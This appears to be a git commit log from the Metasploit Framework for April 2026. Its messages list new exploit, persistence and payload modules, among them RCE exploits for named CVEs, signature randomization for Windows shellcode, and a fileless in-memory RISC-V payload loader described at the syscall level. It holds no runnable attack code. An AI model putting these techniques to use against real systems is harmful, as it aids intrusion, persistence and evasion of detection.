Diego Ledda 9d81fe0f2e Apply suggestion from @smcintyre-r7
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-17 11:26:11 +02:00
Diego Ledda b3ef4db890 Apply suggestion from @smcintyre-r7
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-17 11:25:14 +02:00
Diego Ledda 2af3bbf34e Update lib/msf/core/payload/windows/x64/block_api_x64.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-17 11:23:28 +02:00
Takah1ro 3cfbb90b0f Fix bug 2026-04-17 07:31:25 +09:00
Takahiro Yokoyama 4c5ed36c88 Update modules/exploits/multi/http/langflow_rce_cve_2026_27966.rb
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-04-17 07:10:53 +09:00
Christophe De La Fuente 04ffe3ce3b MCP Server, specs and documentation 2026-04-16 19:31:35 +02:00
bcoles 6821066217 Add find_writable_directories to Msf::Post::File
Add a method to discover writable directories on Unix targets using the
`find` command. This is useful in post-exploitation scenarios where a
module needs to locate a writable staging path.

Parameters:
- path: base directory to search (default: /)
- max_depth: find -maxdepth limit (default: 2)
- timeout: maximum seconds for cmd_exec to wait (default: 15)

Raises on Windows sessions. Returns an array of absolute paths, or nil
on failure. Non-absolute lines (e.g. find error messages) are filtered
from the output.
2026-04-17 02:31:19 +10:00
jenkins-metasploit 37ff9f8530 automatic module_metadata_base.json update 2026-04-16 16:00:17 +00:00
adfoster-r7 e7c5e0e4a3 Merge pull request #21238 from bcoles/loongarch64-chmod
Add Linux LoongArch64 chmod payload
2026-04-16 16:51:00 +01:00
adfoster-r7 0644f27cb6 Add module documentation, tests, and misc feedback 2026-04-16 16:18:46 +01:00
jenkins-metasploit 2b37cbe35e Bump version of framework to 6.4.129 2026-04-16 13:29:17 +00:00
adfoster-r7 c887384546 Merge pull request #21275 from adfoster-r7/improve-mongobleed-checks
Improve mongobleed checks
2026-04-16 14:22:51 +01:00
Takah1ro 4973d666ff Relocate json to an external file 2026-04-16 21:57:07 +09:00
dledda-r7 953d0343dd fix: updated cache size after blockapi changes 2026-04-16 08:50:42 -04:00
dledda-r7 a50041b697 feat: update register usage for block API calls to use r10d in various payloads 2026-04-16 08:37:32 -04:00
Takahiro Yokoyama b917de89c3 Merge branch 'rapid7:master' into langflow_rce_cve_2026_27966 2026-04-16 20:58:02 +09:00
jenkins-metasploit 03e8567559 automatic module_metadata_base.json update 2026-04-16 11:11:15 +00:00
adfoster-r7 5b58f289e5 Merge pull request #21304 from adfoster-r7/improve-auxiliary-check-code-messages
Improve auxiliary check code messages
2026-04-16 12:02:42 +01:00
adfoster-r7 31ef5e03b5 Improve auxiliary check code messages 2026-04-16 11:22:51 +01:00
dledda-r7 340a72438b feat: refactor exit function handling to use block_api_hash 2026-04-16 04:24:44 -04:00
dledda-r7 2be47dbe9c feat: change exitfunc_helper to be accessible 2026-04-16 04:24:44 -04:00
dledda-r7 b8f8366ff1 docs: adding small comment to call out block api randomization 2026-04-16 04:24:43 -04:00
dledda-r7 1f8bb3b52a feat: refactor exit function handling to use helper method for block api randomization 2026-04-16 04:24:43 -04:00
dledda-r7 3233e3c011 feat: block api iv randomization in PrependMigrate 2026-04-16 04:24:43 -04:00
dledda-r7 8a63392284 feat: block api randomization for x86 payloads 2026-04-16 04:24:42 -04:00
dledda-r7 a54f29f02b feat: block api randomization for x64 payloads 2026-04-16 04:24:42 -04:00
dledda-r7 ab0fdf96f8 feat: block api randomization for windows/x64/reverse_tcp 2026-04-16 04:24:41 -04:00
jenkins-metasploit 3106aef203 automatic module_metadata_base.json update 2026-04-16 08:21:35 +00:00
Diego Ledda 214256ffe8 Merge pull request #21310 from zeroSteiner/fix/remove-eshell-payloads
Remove the encrypted shell payload and libs
2026-04-16 04:13:02 -04:00
BootstrapBool d530230b5f Reflects module name change in documentation. 2026-04-15 16:16:16 -04:00
BootstrapBool f52184a566 Renames module
Places rails version check after downgrading concurrent-ruby
2026-04-15 16:07:15 -04:00
bootstrapbool 1bbfb699e1 Ensure curl
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-04-15 15:49:49 -04:00
bootstrapbool eddd3fecff Always output logs pertaining to version
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-04-15 15:48:40 -04:00
jenkins-metasploit 796ffb6331 automatic module_metadata_base.json update 2026-04-15 19:31:55 +00:00
Brendan c17c301e36 Merge pull request #21095 from LucasCsmt/multi/http/churchcrm_db_restore_rce
Adds exploit module for ChurchCRM authenticated RCE (CVE-2025-68109)
2026-04-15 14:22:56 -05:00
jenkins-metasploit aad2c79603 automatic module_metadata_base.json update 2026-04-15 17:39:53 +00:00
adfoster-r7 cb45c37eea Merge pull request #21309 from sfewer-r7/fortiweb-fix1
Improve the fortinet_fortiweb_create_admin aux module check method
2026-04-15 18:31:03 +01:00
Spencer McIntyre 91633fdad7 Remove the encrypted shell payload and libs 2026-04-15 12:43:29 -04:00
sfewer-r7 ad1dac2a5b fix false posatives in the check method by implementing the same check logic as modules/exploits/linux/http/fortinet_fortiweb_rce.rb 2026-04-15 17:37:29 +01:00
Diego Ledda c81a2ee9e3 Merge pull request #21287 from zeroSteiner/fix/exe-compat
Fix EXE template compatibility with Windows Server 2000
2026-04-15 11:30:34 -04:00
adfoster-r7 0ba59a1254 Update documentation/modules/exploit/multi/http/churchcrm_db_restore_rce.md
Co-authored-by: Brendan <bwatters@rapid7.com>
2026-04-15 16:07:43 +01:00
adfoster-r7 7f413ef68f Merge pull request #21291 from sjanusz-r7/add-notes-to-module-info-over-rpc
Return notes for module over RPC
2026-04-15 14:33:30 +01:00
adfoster-r7 c3cc091a2f Merge pull request #21289 from sjanusz-r7/rpc-hosts-returns-comments
Return comments for hosts over RPC
2026-04-15 14:31:35 +01:00
adfoster-r7 d2f350f627 Merge pull request #21290 from dledda-r7/fix/payload-cached-size-debug
Fix annoying bug for payload cached size
2026-04-14 22:58:19 +01:00
Spencer McIntyre 862b1e1aaa Add the test since it'll work now 2026-04-14 17:28:44 -04:00
Spencer McIntyre e8e5362aa9 Bump rex-bin_tools to 0.1.16 2026-04-14 17:28:35 -04:00
jenkins-metasploit e2dff5cc50 automatic module_metadata_base.json update 2026-04-14 20:15:55 +00:00
Diego Ledda 1d5eae0f5b Merge pull request #21034 from Chocapikk/add-module-opendcim-sqli-rce
Add openDCIM install.php SQLi to RCE module
2026-04-14 16:04:13 -04:00
Diego Ledda b13b669aaa Add MeterpreterDebugBuild option to payload options
Added 'MeterpreterDebugBuild' option to payload options.
2026-04-14 21:46:21 +02:00
Diego Ledda addcd69205 Merge pull request #20933 from madefourit/persis_pwrshell_profile
Windows Persistence: Powershell Profile
2026-04-14 15:43:06 -04:00
Diego Ledda 31a2de9562 Merge pull request #20839 from h00die/bits
New persistence module: Microsoft Bits
2026-04-14 15:42:55 -04:00
Spencer McIntyre b3d367f1bf Merge pull request #21085 from dledda-r7/issue-19309
Update block-api to prepare for a random IV
2026-04-14 15:35:10 -04:00
Spencer McIntyre 53f8053b77 Merge pull request #21255 from mxnvel/payloads-multi-python-support
multi python support for cmd/unix/reverse_python and cmd/unix/reverse_python_ssl
2026-04-14 15:25:09 -04:00
bootstrapbool 5d5896d3a1 Formatting Fix/Improvement 2026-04-14 19:18:54 +00:00
adfoster-r7 43ffa96f34 Merge pull request #21298 from bwatters-r7/fix/marshal_validator
Fix sign-extension formula in marshal validator
2026-04-14 20:14:09 +01:00
bootstrapbool fcdb16e69a Document setup process for Camaleon CMS 2026-04-14 19:12:56 +00:00
bwatters-r7 b4084eaaa6 Fix sign-extension formula 2026-04-14 12:56:32 -05:00
sjanusz-r7 4383ad6673 Return comments for hosts over RPC 2026-04-14 17:25:18 +01:00
g0t mi1k 9f480e55d5 phpmyadmin_config: Misc feedback updates
Sorry its thrown all in a big commit and not splitting up.
2026-04-14 16:35:13 +01:00
Spencer McIntyre 8dab0bbba0 Add tests so this doesn't break again in the future 2026-04-14 11:32:38 -04:00
jenkins-metasploit 9f1dc3d9f9 automatic module_metadata_base.json update 2026-04-14 15:19:17 +00:00
Diego Ledda 7ea55d86d9 fix: update from srvhost to srvhost_addr 2026-04-14 17:16:54 +02:00
Diego Ledda 976f5a8e66 fix: remove unecessary srvhost check 2026-04-14 17:14:51 +02:00
Brendan ee5ba948d7 Merge pull request #21286 from Hemang360/add-def_mkdir-toggle
Add cleanup toggle to file mixin mkdir method
2026-04-14 10:10:09 -05:00
Brendan 4c421532d6 Merge pull request #21288 from g0tmi1k/AutoCheck
Add AutoCheck to various exploit modules
2026-04-14 09:59:25 -05:00
jenkins-metasploit dbcb702e1d automatic module_metadata_base.json update 2026-04-14 14:41:11 +00:00
msutovsky-r7 5b6c2be9d1 Land #21003, unifies Selenium Firefox and Chrome modules
Unified Selenium Grid/Selenoid RCE with Firefox + Chrome auto-detection
2026-04-14 16:32:06 +02:00
Spencer McIntyre b6dd5bbcfc Switch to building with powershell and add patch
Need to patch the headers for compatibility with Server 2000
2026-04-14 10:31:29 -04:00
Diego Ledda 1b195b1406 fix: removing ARCH_AARCH64 from powershell_profile persistence 2026-04-14 09:45:47 -04:00
madefourit 9433413166 final module fixes 2026-04-14 09:45:46 -04:00
madefourit a94dd32492 final module 2026-04-14 09:45:46 -04:00
madefourit 05914feb4d module docs and description_formatted 2026-04-14 09:45:45 -04:00
madefourit 0ba93b6ae3 module docs and description 2026-04-14 09:45:45 -04:00
h00die 14cd7fad47 module docs 2026-04-14 09:45:44 -04:00
h00die 4474c77ca3 update pshell module 2026-04-14 09:45:44 -04:00
h00die 9e506cc5a0 update pshell module 2026-04-14 09:45:43 -04:00
h00die 9189436a42 payload debugging 2026-04-14 09:45:43 -04:00
h00die 3c341e3b72 update pshell module 2026-04-14 09:45:42 -04:00
madefourit c03a9a5ce2 update modules_2 2026-04-14 09:45:42 -04:00
madefourit f255fe398d update modules 2026-04-14 09:45:41 -04:00
madefourit 17a5daabf1 inital modules 2026-04-14 09:45:41 -04:00
madefourit e2810a791b Add Profile and initial skeleton 2026-04-14 09:45:40 -04:00
Diego Ledda 18c11b17a9 Update modules/exploits/windows/persistence/bits.rb 2026-04-14 14:34:00 +02:00
dwelch-r7 d8687d43dd Merge pull request #21295 from adfoster-r7/remove-ip-requirements-from-markdown-files
Remove IP requirements from markdown files
2026-04-14 13:26:06 +01:00
adfoster-r7 7dcb339a16 Remove IP requirements from markdown files 2026-04-14 13:19:17 +01:00
adfoster-r7 61cb83943a Merge pull request #21293 from dwelch-r7/remove-old-postgres-version
bump postgres from 9.6 to 14.19 for gem tests
2026-04-14 12:43:33 +01:00
Dean Welch 9f4a68895a bump postgres from 9.6 to 14.19 for gem tests 2026-04-14 12:42:21 +01:00
Chocapikk 62e2c336d0 Remove old Selenium modules replaced by unified selenium_greed_rce 2026-04-14 12:32:51 +02:00
sjanusz-r7 6b174c1022 Return notes for module over RPC 2026-04-14 11:25:27 +01:00
dwelch-r7 0d54137862 Merge pull request #21276 from dwelch-r7/rails-8-gem-ci-test
Add rails 8 to shared gem ci run
2026-04-14 11:18:12 +01:00
Dean Welch 65271019f3 expose rails version env variable in shared tests 2026-04-14 11:12:31 +01:00
dledda-r7 70f470c537 fix: set MeterpreterDebugBuild to false for stageless meterpreter payloads in PayloadCachedSize class 2026-04-14 06:11:14 -04:00
dledda-r7 7f0b8c83a1 fix: update CachedSize 2026-04-14 06:06:47 -04:00
Martin Sutovsky db0fe4aaef Fixes Python payload delivery for Firefox profile 2026-04-14 10:17:04 +02:00
g0t mi1k 71f37467d7 http_login: Make rubocop happy 2026-04-14 06:28:55 +01:00
g0t mi1k 3fea1d279d http_login: Be more verbose 2026-04-14 06:28:55 +01:00
g0t mi1k 8bb476a7f5 WebDAV: Misc formatting 2026-04-14 06:28:55 +01:00
g0t mi1k d2ea521ba3 WebDAV: Add check() function 2026-04-14 06:28:45 +01:00
g0t mi1k 10fd6b9ef8 Add AutoCheck to various exploit modules 2026-04-14 06:21:15 +01:00
jenkins-metasploit 57f5fa3559 Bump version of framework to 6.4.128 2026-04-13 22:35:50 +00:00
Brendan 4ae7af2e65 Merge pull request #21236 from bcoles/riscv-fileless
Add RISC-V fileless fetch payload support
2026-04-13 16:51:14 -05:00
jenkins-metasploit e9491f8a7e automatic module_metadata_base.json update 2026-04-13 21:02:01 +00:00
adfoster-r7 89d0115185 Improve mongobleed checks 2026-04-13 21:53:42 +01:00
Brendan 1113a5e109 Merge pull request #21252 from zeroSteiner/feat/adcs/api-consolidation
Feat/adcs/api consolidation
2026-04-13 15:52:55 -05:00
Hemang360 e0c3ecfd74 Add tests for mkdir method 2026-04-14 02:18:15 +05:30
Hemang360 edbd3d5cd1 Add cleanup toggle to mkdir method 2026-04-14 02:04:38 +05:30
Chocapikk d84b09a16e Fix: Wrap Python payload for Firefox profile handler
The Firefox exploit path delivers payloads via a MIME handler mapped to
/bin/sh. When using the default Python target, the raw Python payload
would fail to execute in /bin/sh. Wrap it with python3 -c so the shell
can invoke it correctly.
2026-04-13 17:57:48 +02:00
jenkins-metasploit e2958ab915 automatic module_metadata_base.json update 2026-04-13 15:25:36 +00:00
dledda-r7 e69ed8d18b build: update rex-text gem version to 0.2.62 2026-04-13 11:17:29 -04:00
Spencer McIntyre 10140d42b4 Merge pull request #21284 from Ekzorcist/patch-2
Update shell_bind_tcp_random_port.rb
2026-04-13 11:16:29 -04:00
Ekzorcist cb6c6492cd Update shell_bind_tcp_random_port.rb
changing my name to a nickname due to some irrelevant and confusing occurances on the Internet for my name and the surname first letter.
2026-04-13 16:10:37 +02:00
Spencer McIntyre 18b0cbc212 Require the newer version of metasploit-credential 2026-04-13 09:20:51 -04:00
Dean Welch 9eae158fa4 Add configurable rails version to shared gem ci run 2026-04-13 14:12:25 +01:00
adfoster-r7 9dbea3d5e2 Fix msftidy heading in codeblock edgecase 2026-04-13 13:51:28 +01:00
dledda-r7 f7b0076679 fix: revert Gemfile and Gemfile.lock 2026-04-13 08:42:27 -04:00
jenkins-metasploit 117196c830 automatic module_metadata_base.json update 2026-04-13 11:01:07 +00:00
adfoster-r7 4ce14e6696 Merge pull request #21268 from adfoster-r7/update-checkcode-usage-in-aux-modules
Update checkcode usage in aux modules
2026-04-13 11:50:02 +01:00
h00die e28969980d Update modules/exploits/windows/persistence/bits.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2026-04-13 06:15:03 -04:00
jenkins-metasploit e3fe7e1da8 automatic module_metadata_base.json update 2026-04-13 09:45:24 +00:00
adfoster-r7 44a6da0e53 Merge pull request #21078 from Chocapikk/fix-churchcrm
Fix ChurchCRM unauthenticated RCE module
2026-04-13 10:36:18 +01:00
sjanusz-r7 4281e713a0 Fix syscall_inject compilation errors on MacOS with MinGW 15 2026-04-13 10:25:27 +01:00
h00die a4d84fa734 Merge branch 'rapid7:master' into bits 2026-04-13 05:14:48 -04:00
jenkins-metasploit 9562402c87 automatic module_metadata_base.json update 2026-04-13 08:00:25 +00:00
msutovsky-r7 659a6cfc9b Land #21274, updates shell_bind_tcp_random_port.rb
Update shell_bind_tcp_random_port.rb
2026-04-13 09:39:55 +02:00
Ekzorcist 5f52ad082f Update shell_bind_tcp_random_port.rb
Removed my email and shorten the full surname. I got too much spam recently.
2026-04-12 21:12:33 +02:00
BootstrapBool dc82a22939 Removes unnecessary print 2026-04-11 20:41:54 -04:00
BootstrapBool 8684cec986 Corrects check method 2026-04-11 20:28:28 -04:00
BootstrapBool d441c07408 Corrects documentation
Removes unnecessary options

Removes credentials from logs

Refactors check method

Makes use of Rex::Version

Removes get_base_url in favor of relative filepaths in send_request_cgi

Other small changes
2026-04-11 19:31:22 -04:00
msutovsky-r7 e79b3cf8a2 Land #21027, fixes alignment of ELF shared object templates
Fixes alignment in ELF shared object templates
2026-04-11 12:20:32 +02:00
h00die 8957e4470c Merge pull request #38 from dledda-r7/collab/feat/persistence-bits
fix bits persistence to be used with HttpServer
2026-04-10 14:16:03 -04:00
h00die 7f041fd4c9 Merge branch 'bits' into collab/feat/persistence-bits 2026-04-10 13:20:26 -04:00
h00die a79fbd7889 Update modules/exploits/windows/persistence/bits.rb
Co-authored-by: Diego Ledda <diego_ledda@rapid7.com>
2026-04-10 13:14:33 -04:00
Spencer McIntyre 5824bd5d03 Fix kerberos authentication for web_enrollment_cert 2026-04-10 11:43:37 -04:00
Spencer McIntyre 6f813f9b7a Report services using the new style 2026-04-10 11:43:37 -04:00
Spencer McIntyre 8ad2dc652a Bump the version of metasploit-credential 2026-04-10 11:43:37 -04:00
adfoster-r7 3aa019470e Update checkcode usage in aux modules 2026-04-10 16:18:07 +01:00
adfoster-r7 9a613fc249 Add rubocop rule 2026-04-10 16:18:04 +01:00
dledda-r7 55f0124e34 fix: fix Gemfile Gemfile.lock 2026-04-10 10:53:26 -04:00
dledda-r7 c6346bcd05 fix: update Gemfile and Gemfile.lock 2026-04-10 10:53:26 -04:00
dledda-r7 e0c28496b9 fix: update CachedSize 2026-04-10 10:53:25 -04:00
dledda-r7 929b79a346 fix: update cache size, fix bug in reverse pipe and tcp x64 2026-04-10 10:53:25 -04:00
dledda-r7 91c96c7e46 fix: updated cache size after blockapi changes 2026-04-10 10:53:24 -04:00
Diego Ledda c0e073b5f8 Apply suggestion from @dledda-r7 2026-04-10 10:53:24 -04:00
Diego Ledda e0f99e0c5c Apply suggestion from @dledda-r7 2026-04-10 10:53:24 -04:00
dledda-r7 6e4be026a2 fix(block_api): block-api graphml file using unicode_string->length 2026-04-10 10:53:23 -04:00
dledda-r7 46fbe0bfb8 fix(shellcode): updating block-api to use Length instead of MaximumLength 2026-04-10 10:53:22 -04:00
Spencer McIntyre c3c6a21e55 Update the block API hashing algorithm
Allow the block API hashing algorithm to accept an IV
2026-04-10 10:53:22 -04:00
Takah1ro 2f15039985 Lint formatting 2026-04-10 23:44:26 +09:00
jenkins-metasploit 8b81b0daa3 automatic module_metadata_base.json update 2026-04-10 13:08:32 +00:00
Brendan 800614101d Merge pull request #21233 from bcoles/exploit-linux-local-riscv
Add RISC-V arch support to Linux local exploit modules
2026-04-10 07:58:34 -05:00
jenkins-metasploit bd73d983ea automatic module_metadata_base.json update 2026-04-09 21:31:16 +00:00
Brendan a90ec1071c Merge pull request #21075 from Chocapikk/avideo-catname-sqli
Add AVideo catName blind SQLi credential dump (CVE-2026-28501)
2026-04-09 16:22:45 -05:00
mxnvel 2f8d66bc6c Change nil check to blank in reverse_python_ssl.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-09 22:08:26 +02:00
mxnvel 63dd2ab31a Change nil check to blank in reverse_python.rb
Co-authored-by: Spencer McIntyre <58950994+smcintyre-r7@users.noreply.github.com>
2026-04-09 22:07:57 +02:00
dwelch-r7 e310740868 Merge pull request #21265 from adfoster-r7/fix-flakey-rspec-test
Fix flakey rspec tests
2026-04-09 16:36:28 +01:00
adfoster-r7 536b34a0e4 Update cache sizes for bash payloads 2026-04-09 16:23:35 +01:00
jenkins-metasploit 92b200e430 automatic module_metadata_base.json update 2026-04-09 14:46:28 +00:00
Spencer McIntyre 657310042b Remove extra OID definitions 2026-04-09 10:37:05 -04:00
Spencer McIntyre b7e7de2fa4 Update the specs so they pass again 2026-04-09 10:37:05 -04:00
Spencer McIntyre 57bb3bbce7 Refactor code to use #with_adcs_certificate_request 2026-04-09 10:37:05 -04:00
Spencer McIntyre 9cedb4a069 Refactor the method name to namespace it to icpr 2026-04-09 10:37:05 -04:00
Spencer McIntyre 8a748d4954 Standardize printed messages a bit more 2026-04-09 10:37:05 -04:00
Spencer McIntyre 4d02f92fab Consolidate the attribute creation 2026-04-09 10:37:05 -04:00
Spencer McIntyre dac67e6ee6 Update the specs 2026-04-09 10:37:05 -04:00
Spencer McIntyre f177b98bfb Consolidate more into #create_csr 2026-04-09 10:37:05 -04:00
Spencer McIntyre 3d5692e9bb Swapping the datastore is no longer necessary 2026-04-09 10:37:05 -04:00
Spencer McIntyre a0e188bbbe Use #fetch so that nil is honored 2026-04-09 10:37:04 -04:00
Spencer McIntyre d84f6f9f8a Merge pull request #21262 from adfoster-r7/update-cache-sizes-for-bash-payloads
Update cache sizes for bash payloads
2026-04-09 10:33:16 -04:00
msutovsky-r7 33a2e0216d Land #20843, adds Windows telemetry persistence module
windows telemetry persistence
2026-04-09 16:29:01 +02:00
Martin Sutovsky 53df5b989a Fixes alignment for Riscv32 LE 2026-04-09 16:24:51 +02:00
Martin Sutovsky ac715797a7 Rreplaces the hardcoded padding with align 4 keyword 2026-04-09 16:09:55 +02:00
adfoster-r7 887137d615 Update cache sizes for bash payloads 2026-04-09 15:09:10 +01:00
Takah1ro 4dcf67865a minor change 2026-04-09 22:18:01 +09:00
Takah1ro a6d7502c8d Add langflow_rce_cve_2026_27966 module 2026-04-09 22:12:10 +09:00
h00die 9960ec2355 fix compatibility with session.sys on windows persistence modules 2026-04-09 15:03:49 +02:00
h00die 8f441aca9a add attck ref 2026-04-09 15:02:43 +02:00
h00die 475f203760 windows telemetry persistence 2026-04-09 15:02:42 +02:00
jenkins-metasploit 24e2124ebd Bump version of framework to 6.4.127 2026-04-09 12:14:30 +00:00
dledda-r7 4a8adacf29 fix: fix bits persistence to be used with HttpServer 2026-04-09 07:13:26 -04:00
g0t mi1k 4f38ec3393 WebDAV: Improve response 2026-04-08 17:03:16 +01:00
g0t mi1k 0f4db29f2b WebDAV: Creds is optional 2026-04-08 17:03:16 +01:00
g0t mi1k 328c2e5845 WebDAV: Update workspace 2026-04-08 17:03:16 +01:00
g0t mi1k 918281a5dc WebDAV: Clean up after exploiting 2026-04-08 17:03:16 +01:00
g0t mi1k 6603450572 WebDAV: PATH -> URI 2026-04-08 17:03:16 +01:00
g0t mi1k 2979dafdf4 WebDAV: Make rubocop happy 2026-04-08 17:03:07 +01:00
g0t mi1k 437b8a7cf6 WebDAV isn't just for Windows 2026-04-08 16:36:35 +01:00
jenkins-metasploit 6c359bfa00 automatic module_metadata_base.json update 2026-04-08 15:01:17 +00:00
jheysel-r7 1fc1552fc4 Merge pull request #20973 from bitstr3m-48/feature/hwbridge-sessions-c-and-json-errors
HWBridge: support sessions -c execution and preserve non-200 JSON errors
2026-04-08 07:52:14 -07:00
jeanmtr b3e456d661 made the PythonPath option optional 2026-04-08 12:59:40 +02:00
jeanmtr c4709e7692 forgot to make the change on both the ssl and non ssl version 2026-04-08 12:59:40 +02:00
jeanmtr 5dd4f4e9ce fix: make PythonPath blank by default auto-detection fallback 2026-04-08 12:59:40 +02:00
jeanmtr f7d7619051 added multi python support for payloads that lacked it 2026-04-08 12:59:40 +02:00
adfoster-r7 3de026b88c Merge pull request #21221 from cgranleese-r7/update-module-doc-template-with-example
Adds examples to module template markdown
2026-04-08 10:51:49 +01:00
jenkins-metasploit 23156732b0 automatic module_metadata_base.json update 2026-04-08 09:48:55 +00:00
adfoster-r7 6c24a059ae Merge pull request #21031 from zeroSteiner/fix/issue/20959
LDAP Reporting Improvements
2026-04-08 10:39:17 +01:00
cgranleese-r7 db9f98e704 Adds examples to module template markdown 2026-04-08 09:25:08 +01:00
bitstr3m b9fee17018 Update modules/auxiliary/client/hwbridge/connect.rb
Co-authored-by: jheysel-r7 <Jack_Heysel@rapid7.com>
2026-04-07 14:26:06 -07:00
bitstr3m 1c46006cb4 hwbridge/connect: preserve non-200 JSON errors
Parse and return non-200 JSON response bodies (with _http_status) in fetch_json so adapter-side error details are not dropped.
2026-04-07 14:26:06 -07:00
bitstr3m 4bd2f415d7 hwbridge: enable sessions -c command execution
Add hwbridge handling in cmd_sessions -c path by executing session.console.run_single(cmd), enabling non-interactive HWBridge command automation.
2026-04-07 14:26:06 -07:00
jenkins-metasploit e4c7508b09 automatic module_metadata_base.json update 2026-04-07 16:48:32 +00:00
jheysel-r7 94ccd8bd20 Merge pull request #20948 from ArkaprabhaChakraborty/osticket
Add initial osticket arbitraray file read auxiliary module
2026-04-07 09:39:01 -07:00
Jack Heysel 50624c69d0 Fix linting issues in lib 2026-04-07 08:48:21 -07:00
jenkins-metasploit 8b3241ba19 automatic module_metadata_base.json update 2026-04-07 14:30:02 +00:00
Diego Ledda a778410498 Merge pull request #21240 from bwatters-r7/bump/metasploit-payloads_2.0.245
Update metasploit-payloads to 2.0.245
2026-04-07 10:20:37 -04:00
jenkins-metasploit e4b89158ba automatic module_metadata_base.json update 2026-04-07 09:31:50 +00:00
Diego Ledda 08e29e833d Merge pull request #20814 from h00die/s4u
s4u persistence updates
2026-04-07 05:22:01 -04:00
jenkins-metasploit 4bacaee3e7 automatic module_metadata_base.json update 2026-04-06 19:36:05 +00:00
Spencer McIntyre a0852387fc Merge pull request #20752 from bwatters-r7/feature/certificate-web-enrollment
Add Authenticating Web Enrollment module for AD/CS
2026-04-06 15:27:28 -04:00
bwatters-r7 f46f41147f Update payload cache sizes. 2026-04-06 13:47:12 -05:00
jenkins-metasploit fee008a507 automatic module_metadata_base.json update 2026-04-06 18:43:15 +00:00
Spencer McIntyre 46456c2a08 Merge pull request #20977 from g0tmi1k/php_eval
php_eval: Improve check, fix exploit, add POST support & more verbose
2026-04-06 14:34:37 -04:00
bwatters-r7 06edc3d08f change minor syntax and raise exception for rsa keylength mismatch 2026-04-06 13:12:47 -05:00
Spencer McIntyre 93506acce2 Merge pull request #21229 from bcoles/msfvenom-cache
msfvenom: Use metadata cache for --list, add --refresh-cache
2026-04-06 14:00:19 -04:00
bcoles 9ecd34c988 msfvenom: Use metadata cache for --list, add --refresh-cache 2026-04-07 01:23:47 +10:00
bwatters-r7 d2407770e9 Update metasploit-payloads to 2.0.245 2026-04-06 09:29:02 -05:00
bcoles 6ba950c526 Add Linux LoongArch64 chmod payload 2026-04-06 11:40:14 +10:00
bcoles d931762916 Add RISC-V fileless fetch payload support
Add riscv64le and riscv32le architecture support to the fileless
fetch payload adapter. This enables in-memory ELF execution via
memfd_create on RISC-V Linux targets without writing to disk.

The first-stage shellcode (52 bytes, 13 instructions) performs:
  memfd_create("") -> ftruncate(fd, 0) -> getpid() -> kill(pid, SIGSTOP)

Uses getpid + kill(SIGSTOP) instead of pause, as pause is not
available in the asm-generic syscall table used by RISC-V. This
matches the existing aarch64 approach.

The jump stub uses auipc + ld/lw + jalr to load and branch to an
absolute address embedded after the instruction sequence (20 bytes
for rv64, 16 bytes for rv32).

Only RV32I/RV64I base integer instructions are used. The sole
difference between the two variants is sd vs sw for the stack
store.
2026-04-05 17:06:42 +10:00
g0t mi1k b338c774cd Split HEADERS using '=' rather than ':' 2026-04-05 07:30:32 +01:00
g0t mi1k 14c841bb28 php_eval: evalme -> eval 2026-04-05 07:27:20 +01:00
g0t mi1k 6ef9234622 php_eval: Use check() to run a command 2026-04-05 07:27:20 +01:00
g0t mi1k 926ec78d23 php_eval: Consistencies
Sorry, not sorry
2026-04-05 07:27:20 +01:00
g0t mi1k 1f569b3a71 php_eval: Header don't have the same badchars 2026-04-05 07:27:20 +01:00
g0t mi1k fdfa10cde7 php_eval: Be more verbose 2026-04-05 07:27:20 +01:00
g0t mi1k 71b40641d5 php_eval: Add POST HTTP method support 2026-04-05 07:27:20 +01:00
g0t mi1k 6945f89b74 php_eval: Sends headers using check() 2026-04-05 07:27:20 +01:00
g0t mi1k b554cd7277 php_eval: Makes sure there is a response using check() 2026-04-05 07:27:20 +01:00
g0t mi1k 2dcdda88b0 php_eval: Header var needs to be a string 2026-04-05 07:27:19 +01:00
g0t mi1k f8b0608d62 php_eval: !CODE! -> !INJECT! 2026-04-05 07:27:19 +01:00
g0t mi1k 02bf188e78 php_eval: PHPURI -> URIPATH 2026-04-05 07:27:19 +01:00
bcoles 338db0cabd Add RISC-V arch support to Linux local exploit modules
Add ARCH_RISCV64LE and ARCH_RISCV32LE to the supported architecture
lists of 9 Linux local privilege escalation modules that use generic
EXE payload dropping and are not dependent on pre-compiled
architecture-specific exploit binaries.

This allows these modules to be used on RISC-V targets with the
existing RISC-V payload set.
2026-04-05 02:15:16 +11:00
bcoles 235da57b97 Module metadata: string dedup, shared empty containers, platform caching 2026-04-04 12:14:17 +11:00
bcoles 3ac30e09cc Module metadata: string dedup, shared empty containers, platform caching 2026-04-04 11:54:38 +11:00
jenkins-metasploit 0acd6fbc36 automatic module_metadata_base.json update 2026-04-03 21:20:16 +00:00
Spencer McIntyre 45942c8d5e Merge pull request #21180 from jheysel-r7/feat/lib/relay_functionality_refactor
Refactor reusable relay classes out of the SMB directory
2026-04-03 17:10:56 -04:00
jenkins-metasploit cbd6b11d48 automatic module_metadata_base.json update 2026-04-03 20:37:51 +00:00
Spencer McIntyre 789bcb13ac Merge pull request #20979 from g0tmi1k/php_include
php_include: Improve check & Clean up
2026-04-03 16:29:19 -04:00
Christophe De La Fuente aced72809e Merge pull request #21153 from Nayeraneru/fixed/datastore_AdvancedOptions 2026-04-03 17:53:16 +02:00
bwatters-r7 d10341befd Fixes for different paths to create_csr and build_csr 2026-04-02 16:23:34 -05:00
Jack Heysel 5111f9eb52 Refactor HashCapture 2026-04-02 13:14:06 -07:00
Jack Heysel 4125b209f8 Refactor reusable relay classes out of SMB directory
Apply suggestions from code review

Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
2026-04-02 13:14:06 -07:00
jenkins-metasploit 7b54e35a2f automatic module_metadata_base.json update 2026-04-02 18:57:02 +00:00
jheysel-r7 9dc1690b64 Merge pull request #21226 from zeroSteiner/fix/mod/payload-cached-sizes-2026-04-02
Update the cached payload size
2026-04-02 11:48:25 -07:00
Spencer McIntyre 696739f32f Update the cached payload size 2026-04-02 14:31:06 -04:00
